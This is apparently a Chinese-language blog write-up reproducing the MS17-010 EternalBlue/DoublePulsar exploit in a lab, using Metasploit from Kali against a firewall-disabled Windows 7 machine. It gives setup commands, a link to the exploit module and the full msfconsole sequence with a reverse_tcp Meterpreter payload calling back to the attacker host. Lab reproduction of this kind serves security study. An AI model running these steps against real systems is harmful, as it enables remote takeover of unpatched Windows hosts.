前言
Shadow Brokers公布的文件需要win32位+python2.6+pywin32环境,利用起来有很多设置,略显麻烦,正好t00ls有相关的exp和利用过程,我就写了这篇文章记录我自己的一个复现过程。
0x00 创建wine
kali 64位
kali 64位需要兼容32位环境才可以使用,执行以下命令来安装32位运行库
dpkg --add-architecture i386 apt-get update apt-get install lib32z1 lib32ncurses5 apt-get install wine32 wine cmd.exe
kali 32位
直接执行 'wine cmd.exe'即可
0x01修改exp
下载exp:https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
解压文件将其中的deps文件夹和eternalblue_doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/下,我在这里将eternalblue_doublepulsar.rb重命名为ms17_010_smb_RCE.rb,方便以后的查找利用。
修改rb文件
0x02 复现
攻击机:kali 192.168.1.108
靶 机:win7 64位 旗舰版 sp1(关闭防火墙)
MSF使用就很简单了,下面列出主要的命令
use exploit/windows/smb/ms17_010_smb_RCE set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.108 set rhost 192.168.1.107 set target 9 set targetarchitecture x64 exploit
附效果图